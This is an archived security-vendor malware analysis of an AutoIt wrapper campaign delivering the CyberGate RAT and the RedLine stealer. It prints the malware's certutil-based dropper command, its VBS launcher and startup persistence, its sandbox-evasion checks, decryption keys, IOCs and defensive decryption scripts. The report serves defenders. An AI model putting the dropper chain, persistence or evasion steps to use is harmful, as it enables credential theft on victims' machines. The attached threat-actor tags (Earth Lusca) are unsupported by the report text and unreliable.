{
	"id": "52f75fc9-f531-4c62-84d0-6247149762f8",
	"created_at": "2026-04-06T00:06:36.935609Z",
	"updated_at": "2026-04-10T03:36:48.143392Z",
	"deleted_at": null,
	"sha1_hash": "4e194b7de45fea5a44ab8e9980d747ebad9e2b02",
	"title": "CyberGate, RedLine Part of AutoIt Malware Campaign| Zscaler",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4137862,
	"plain_text": "CyberGate, RedLine Part of AutoIt Malware Campaign| Zscaler\r\nBy Mohd Sadique\r\nPublished: 2020-07-02 · Archived: 2026-04-05 18:59:54 UTC\r\nIn our most recent blog, we detailed a malware campaign that uses a malicious document (DOC) file to deliver an AutoIt script which, in turn, delivers the Taurus stealer to steal credentials, cookies, history, system info, and more. Along similar lines, we recently came across a new malware campaign that uses a similar AutoIt script to deliver a new variant of the CyberGate RAT and the RedLine stealer.\r\nThis blog will walk you through a detailed analysis of the payload delivery mechanism, capabilities, and Command and Control (C\u0026C) communication. We also observed the usage of custom C\u0026C protocols to exfiltrate sensitive information. We will shed light on the custom protocol used by the CyberGate RAT.\r\nBelow is the detection timeline for AutoIt malware campaigns in the past month. We observed several hits for AutoIt malware involving various malware families, including AZOrult, Xtreme RAT, Taurus stealer, RedLine Stealer, and CyberGate RAT. The Zscaler ThreatLabZ team is closely monitoring the developments in these campaigns to ensure coverage.\r\nFigure 1: Hits of AutoIt-based malware in the past month.\r\nZscaler Cloud Sandbox captured the CyberGate RAT and RedLine stealer successfully. We observed that both of them are packed with the same packer and use the same payload delivery mechanism. The tactics, techniques, and procedures (TTPs) observed in these two campaigns are similar in nature, so we suspect that the same actors are behind these attacks.\r\nPayload delivery mechanism\r\nAs observed in a previous blog, the source of the stealer was spam mail containing a link to download the malware or an attached DOC file that downloads the malware. While tracking this campaign, we found that this malware is served by phishing sites. 
At the time of our analysis, we found a live phishing site of a cryptocurrency blockchain exchange called Resistance, which is serving the RedLine stealer.\r\nhttps://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns\r\nPage 1 of 17\n\nFigure 2: A crypto blockchain exchange phishing site.\r\nWrapper analysis\r\nThe files downloaded from these phishing sites are self-extracting archives (SFX), which contain a cabinet file and a script to execute the embedded files. The cabinet file can be found under the RCData resource directory with the name ‘CABINET’, and the command for execution in the resource directory with the name ‘RUNPROGRAM’.\r\nFigure 3: The resource directory of the wrapper file.\r\nThe cabinet file contains three files with a ‘com’ extension; the file names are random and differ in other AutoIt scripts. Those files are:\r\nffXi.com - The legitimate Autoit3.exe interpreter, used to run AutoIt scripts, shipped with a deliberately invalid header\r\nadCt.com - The AutoIt script, Base64-encoded with the Windows certutil tool\r\nbzYfp.com - The encrypted payload\r\nThe command-line script present in the ‘RUNPROGRAM’ resource directory to execute the embedded files is shown below:\r\ncmd /c lsass.com \u0026 type ffXi.com \u003e\u003e lsass.com \u0026 del ffXi.com \u0026 certutil -decode adCt.com R \u0026 lsass.com R \u0026 ping 127.0.0.1 -n 20\r\nFirst, it corrects the header of ‘ffXi.com’ (Autoit3.exe) by appending “M”, stores the result in ‘lsass.com’, and then deletes ‘ffXi.com’. After that, it decodes the Base64-encoded AutoIt script using ‘certutil’ with the parameter “-decode”, saves it to a file “R”, and runs this AutoIt script with Autoit3.exe (lsass.com). In the end, it uses the ping command as a sleep timer. 
\r\nThe AutoIt script uses custom obfuscation, and all the hardcoded strings are encrypted in the malware, as we have seen previously in this campaign. Upon execution, the AutoIt script drops and hides the following four files in the directory “%APPDATA%\\\\cghost” to achieve persistence on the system. We found this persistence technique in the AutoIt script only when the final payload is the RAT.\r\ncghost.com - Copy of the AutoIt interpreter\r\naGuDP - Copy of the AutoIt script\r\nbzYfp.com - Copy of the encrypted payload\r\ndLzSj.vbs - VBS script to execute the AutoIt interpreter with the script\r\nThe VBS file contains:\r\nCGXdBksrYqQnDIwn = GetObject(\"winmgmts:\\\\.\\root\\cimv2:Win32_Process\").Create(\"%appdata%\\cghost\\cghost.com %appdata%\\cghost\\aGuDP\" , \"%appdata%\\cghost\", Null, OJxMEkRRELvrj )\r\nFor persistence, it creates an internet shortcut file ‘cghost.url’ in the startup directory with the following contents:\r\n[InternetShortcut]\r\nURL=\"%APPDATA%\\cghost\\dLzSj.vbs\"\r\nThe AutoIt script has multiple sandbox evasion tricks to avoid detection. It also checks whether a particular file and computer name exist on the system, and checks for a particular domain.\r\nFigure 4: The malware performs multiple checks before execution.\r\nThis malware wrapper avoids execution in the Windows Defender antivirus emulator by checking for the presence of the “C:\\aaa_TouchMeNot.txt” file on the system. The malware terminates execution if it finds one of the following computer names, which are used by AV emulators:\r\n“NfZtFbPfH” - Kaspersky\r\n“tz” - Bitdefender\r\n“ELICZ” - AVG\r\n“MAIN” - VBA\r\n“DESKTOP-QO5QU33” - Assuming this is the attacker’s machine name\r\nIt checks for a patched sleep API using 'GetTickCount' to detect sandbox emulation. 
It also checks for the domain ‘OJtmGmql.OJtmGmql’ and exits if the domain is alive. These are random strings and were found to be different in every other wrapper. If it passes all the above checks, it injects the architecture-appropriate shellcode for the 'RC4' algorithm into the specified running process or into the current process memory.\r\nFigure 5: The RC4 algorithm shellcode.\r\nThe RC4 key is XOR-encrypted in the AutoIt script and can be found in a function call along with the encrypted data and the process path for injection.\r\nFigure 6: The encrypted RC4 key.\r\nThis RC4 key is found to be different in every case. The AutoIt script reads the encrypted payload (bzYfp.com) and decrypts it using the RC4 shellcode with the hardcoded key “537180” (in this case).\r\nFigure 7: The RC4 algorithm in the first shellcode.\r\nAfter that, it injects another shellcode into memory, which first creates a mutex with the name ‘JFTZRATSJPATTZLFCUTTH’, then takes the decrypted PE file, injects it into the process, and executes it. The final payload is decrypted and executed in memory only, so it will not be captured by antivirus products that rely on static detection.\r\nWe have written a Python script to decrypt the encrypted payload, which can be found in Appendix I.\r\nThe payloads dropped by this wrapper are the CyberGate RAT or the RedLine stealer.\r\nCyberGate RAT\r\nThe CyberGate RAT from this campaign looks like a new variant that we have not seen in the past. CyberGate allows an attacker to browse and manipulate files, devices, and settings on the victim's machine as well as download and execute additional malware. 
It also has a wide range of information-stealing abilities, such as keylogging, screen capture, and remote enabling of webcams.\r\nThe capabilities of the CyberGate RAT that we found in this variant include:\r\nCollecting the system info\r\nCreating a specified directory\r\nDownloading and executing additional files\r\nGetting the content of a specified file\r\nStealing the browser’s credentials\r\nCapturing the screen\r\nRunning a keylogger\r\nThe C\u0026C address and port information are encrypted and hardcoded in the binary. The encryption is a simple XOR with the hardcoded key “2qYNYM2Z74XL”.\r\nFigure 8: The XOR decryption of the encrypted IP address.\r\nThe unique bot ID is created by concatenating the username, computer name, and serial number of the victim machine and calculating the MD5 hash:\r\nBot ID = MD5(UserName+ComputerName+SerialNumber)\r\nFigure 9: Bot ID creation.\r\nNetwork traffic analysis\r\nThis variant of CyberGate RAT has a hardcoded and encrypted C\u0026C IP address and communicates over TCP on port 3970. The complete traffic is compressed with zlib and encrypted with RC4 using the hardcoded key present in the binary.\r\nFigure 10: CyberGate network traffic.\r\nFigure 11: Packet structure.\r\nClient and server packets are encrypted and decrypted with RC4 using the same hardcoded key “draZwyK8wNHF”, which is present in the binary. After decryption of the server packets, the data starts with the 14-byte marker “@@XXXXXXXXXX@@” followed by the zlib-compressed data. 
We have seen this marker in the previous version of CyberGate RAT.\r\nFigure 12: The decrypted packet data.\r\nAfter decompression, the data starts with the command followed by the parameters, separated by the marker “##$##”.\r\nStructure: ##$####$##\r\nFigure 13: The decrypted communication between the client and the C\u0026C server.\r\nIn the first request, the command sends the calculated unique bot ID to the server.\r\nThe second command searches for stored credentials in the Chrome and Firefox browser profiles. If they match the parameters, it sends the credentials to the server along with the machine info, including socket name, user name, computer name, product name, and bot ID.\r\nFigure 14: The credentials and machine info that are sent to the server.\r\nThe command “Ky8pr22KrbW3” or “neAWM9TC4tsk” creates the specified directory in %appdata%. It then downloads and stores the specified file inside it and executes it.\r\nFigure 15: The command to download and execute additional malware.\r\nWe have found the following commands in this variant of the CyberGate RAT.\r\nCommand          Description\r\n4hybWKLmEShM     Send the unique bot ID to the server\r\nECDnG66CYsZc     Steal the browser’s credentials and machine info\r\ndYh3GKy2DK       Store data to the registry\r\nKy8pr22KrbW3     Download and execute additional malware\r\nneAWM9TC4tsk     Download and execute additional malware and exit itself\r\nEffNaMNRW43T     Capture the screen\r\n5Qvape9Wv6eA     Start the keylogger\r\nWe have written a Python script to decrypt the CyberGate RAT C\u0026C traffic. 
It can be found in Appendix II.\r\nRedLine stealer\r\nThe final payload is the .NET binary of the RedLine stealer. This stealer is available for sale on Russian forums and was seen before in a COVID-themed email campaign; Proofpoint published a blog about that campaign.\r\nThe capabilities of this stealer include:\r\nCollecting information about the victim’s system\r\nCollecting credentials, cookies, and credit cards from Chromium- and Gecko-based browsers\r\nCollecting data from FTP clients (FileZilla, WinSCP)\r\nCollecting data from IM clients (Pidgin)\r\nCollecting cryptocurrency wallets\r\nDownloading and executing the specified file\r\nFigure 16: The RedLine stealer classes and C\u0026C domain.\r\nThe RedLine stealer uses SOAP over HTTP for its C\u0026C communication.\r\nAfter connecting to the C\u0026C server, RedLine fetches the client configuration settings from the server.\r\nFigure 17: Fetching the client configuration settings.\r\nThese client configuration settings include GrabBrowsers, GrabFTP, GrabFiles, GrabImClients, GrabPaths, GrabUserAgent, and GrabWallets.\r\nFigure 18: The RedLine client configuration settings.\r\nAfter collecting the data as per the configuration, it sends all the data back to the server.\r\nFigure 19: Sending the stolen data to the server.\r\nAfter that, it sends a request to the server to get a task to download a file, execute a file, access a link, or inject a file into a process, along with the victim’s machine info, such as IP, location, OS, and 
more.\r\nFigure 20: Sending the request to the server to get a task.\r\nCoverage\r\nThe observed indicators in this attack were successfully blocked by the Zscaler Cloud Sandbox.\r\nFigure 21: The Zscaler Cloud Sandbox report for the CyberGate RAT.\r\nFigure 22: The Zscaler Cloud Sandbox report for the RedLine stealer.\r\nIn addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels.\r\nThe following are the advanced threat protection signatures released for detecting the malware:\r\nWin32.Backdoor.CyberGate\r\nWin32.Backdoor.RedLine\r\nWin32.PWS.AutoIT\r\nAnd the following is the Cloud IPS (non-web) signature that enables detection of the CyberGate RAT:\r\nWin32.Backdoor.CyberGate\r\nConclusion\r\nWe are observing an increase in the usage of AutoIt scripts as wrappers to deliver malware by threat actors. This trend appears to be getting stronger, with a lot of obfuscation, anti-analysis and anti-sandbox tricks, and fileless techniques being adopted by AutoIt-based malware. The final payloads we have seen in these campaigns are RATs and infostealers, which are capable of stealing sensitive information and installing additional malware. 
Also, the usage of a custom protocol for the exfiltration of sensitive information poses a great challenge for network security solutions trying to block the data exfiltration attempt.\r\nThe Zscaler ThreatLabZ team will continue to monitor AutoIt-based malware campaigns to share the information with the community and to keep our customers safe.\r\nMITRE ATT\u0026CK™ tactic and technique mapping\r\nTechnique ID         Technique\r\nT1059                Execution through Command-Line Interface\r\nT1060                Persistence in startup directory\r\nT1055                Process Injection\r\nT1140                Obfuscated Files\r\nT1503                Steal credentials from web browsers\r\nT1056                Keylogging\r\nT1539                Steal Web Session Cookies\r\nT1083                File and Directory Discovery\r\nT1057                Process Discovery\r\nT1012                Query Registry\r\nT1082                System Information Discovery\r\nT1497                Sandbox Evasion\r\nT1005                Collect Data from Local System\r\nT1113                Screen Capture\r\nT1094                Custom C\u0026C Protocol\r\nT1132                Base64 Data Encoding\r\nT1065                Uncommonly Used Port\r\nT1002                Data Compressed\r\nT1020                Data Exfiltration\r\nT1022                Data Encrypted\r\nIOCs\r\nCybergate RAT\r\n37.252.5[.]213/55.exe (Download URL)\r\n37.252.5[.]213[:]3970 (Cybergate C\u0026C)\r\n433dd4dce13e86688a3af13686c84d1c Packed file\r\n608D98351812A3C2C73B94A6F5BEF048 Encoded autoit file\r\n340F2664D7956A753D8EA2FA5C0044FF Encrypted payload\r\n53A116D2B8AB11B92B293B4AD18CC523 Decoded autoit script\r\n391317CC132C65561811316324171F8C Shellcode 1\r\n63CFBCE717C7761B6802E3C1B1F8ACCF Shellcode 2\r\n88A81C67556D4470F23F703D64606E16 Cybergate RAT\r\nRedLine 
Stealer\r\nresisproject[.]me (Phishing site)\r\nbbuseruploads[.]s3[.]amazonaws[.]com/583b9547-e88c-4247-a01e-655ff985a7ae/downloads/5a2556c5-ec0f-4699-b67c-40b9f2a43fc7/Resistance_Wallet-windows-2.2.9.zip (Download URL)\r\nresisproject[.]cc (Phishing site)\r\nbitbucket[.]org/kapow37047/win64/downloads/ResistanceWallet_2.2.8.exe (Download URL)\r\nyellowbag[.]top (RedLine C\u0026C)\r\n70EFF6AE73C0E276D385929D9E253D02 Packed file\r\nC96BF5CECA92A5362F342A7EE19FDC88 Encoded autoit file\r\nF1AA91851E0F66AAC3F65E4C237E8B51 Encrypted payload\r\n106FCC5A6B51E4B2213694C7B5FF3C08 Decoded autoit script\r\n729BB625379513FC677606888941248B RedLine Stealer\r\n4B0F5B53264C56125BD5C889E063BBCA Packed file\r\n67E67250B0DB02F824804EC17A757B1E Encoded autoit file\r\n67BB52ECFE627A96076AFAFD2DDE32C7 Encrypted payload\r\n293918878C0CE8CFFBD344B16EAC656E Decoded autoit script\r\n9E286AB918E5FACF45B2AE0195CEF54B RedLine Stealer\r\nAppendix I\r\nPython script to decrypt the encrypted CyberGate payload and RedLine payload:\r\nimport sys\r\ndef rc4(key, data):\r\n    # Plain RC4 (KSA + PRGA). Used instead of Crypto.Cipher.ARC4 because PyCryptodome rejects the 4-byte keys below; legacy PyCrypto accepted them.\r\n    S = list(range(256))\r\n    j = 0\r\n    for i in range(256):\r\n        j = (j + S[i] + key[i % len(key)]) \u0026 0xFF\r\n        S[i], S[j] = S[j], S[i]\r\n    out = bytearray()\r\n    i = j = 0\r\n    for c in data:\r\n        i = (i + 1) \u0026 0xFF\r\n        j = (j + S[i]) \u0026 0xFF\r\n        S[i], S[j] = S[j], S[i]\r\n        out.append(c ^ S[(S[i] + S[j]) \u0026 0xFF])\r\n    return bytes(out)\r\n# RC4 keys recovered from the AutoIt wrappers analysed in this campaign\r\nkeys = [b'537180', b'7010', b'2379']\r\nenc_file = sys.argv[1]\r\ndec_file = sys.argv[2]\r\nwith open(enc_file, 'rb') as rf:\r\n    data = rf.read()\r\nfor key in keys:\r\n    out = rc4(key, data)\r\n    # The right key yields a PE file, which starts with the 'MZ' signature\r\n    if out[:2] == b'MZ':\r\n        with open(dec_file, 'wb') as wf:\r\n            wf.write(out)\r\n        print('[+] Decrypted PE file - ' + dec_file)\r\n        break\r\nAppendix II\r\nPython script to decrypt \u0026 decompress CyberGate traffic:\r\nimport zlib\r\nfrom Crypto.Cipher import ARC4\r\nKEY = b'draZwyK8wNHF'        # hardcoded RC4 key present in the binary\r\nMARKER = b'##$##'            # separator between the command and its parameters\r\nHEADER = b'@@XXXXXXXXXX@@'   # 14-byte marker at the start of every decrypted server packet\r\ndef dec_packet(packet):\r\n    # packet: raw bytes of one TCP payload; returns the decompressed plaintext, or b'' if the packet cannot be decoded\r\n    result = b''\r\n    # packet = bytes.fromhex(packet)   # uncomment if the capture is supplied as a hex string\r\n    if len(packet) == 2:             # a bare CRLF carries no data\r\n        return result\r\n    try:\r\n        if packet.startswith(b'\\x0d\\x0a'):\r\n            packet = packet[2:]\r\n        packet = packet.split(MARKER)[1]\r\n        if packet.startswith(b'\\x0d\\x0a'):\r\n            packet = packet[2:]\r\n    except IndexError:\r\n        pass\r\n    try:\r\n        rc4_out = ARC4.new(KEY).decrypt(packet)\r\n        if rc4_out.startswith(HEADER):\r\n            result = zlib.decompress(rc4_out[14:])\r\n    except zlib.error:\r\n        pass\r\n    return result\r\nSource: https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns"
	],
	"report_names": [
		"cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775433996,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4e194b7de45fea5a44ab8e9980d747ebad9e2b02.pdf",
		"text": "https://archive.orkl.eu/4e194b7de45fea5a44ab8e9980d747ebad9e2b02.txt",
		"img": "https://archive.orkl.eu/4e194b7de45fea5a44ab8e9980d747ebad9e2b02.jpg"
	}
}